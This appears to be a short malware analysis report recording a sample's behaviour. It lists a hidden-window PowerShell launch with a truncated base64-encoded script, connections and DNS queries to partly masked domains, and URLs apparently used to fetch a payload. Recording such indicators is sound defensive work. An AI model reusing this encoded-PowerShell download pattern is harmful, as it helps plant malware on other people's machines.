Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABLAHEAbABkAGYAbQBiAHYAcgA9ACcAWABpAGQAdgBvAHIAYgBrAGsAYwBnAHQAYQAnADsAJABGAHkAbQBiAGgAeQBlAHgAbQBoACAAPQAgACcANQA5ADMAJwA7ACQATgBuAHIAZwBxAGkAawBrAGYAcQB5AD0AJwBCAGoAcwBwAGMAcAB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1480
- %TEMP%\1302842.cvr
- 'on###games.jp':80
- 'on###games.jp':443
- 'ur###enta.es':80
- 'ti####ambara.com':443
- http://on###games.jp/contact/iY/
- http://ur###enta.es/img/k35d9q/
- 'on###games.jp':443
- 'ti####ambara.com':443
- DNS ASK on###games.jp
- DNS ASK pm##ome.com
- DNS ASK ur###enta.es
- DNS ASK so###c.com.ar
- DNS ASK ti####ambara.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABLAHEAbABkAGYAbQBiAHYAcgA9ACcAWABpAGQAdgBvAHIAYgBrAGsAYwBnAHQAYQAnADsAJABGAHkAbQBiAGgAeQBlAHgAbQBoACAAPQAgACcANQA5ADMAJwA7ACQATgBuAHIAZwBxAGkAawBrAGYAcQB5AD0AJwBCAGoAcwBwAGMAcAB... (со скрытым окном)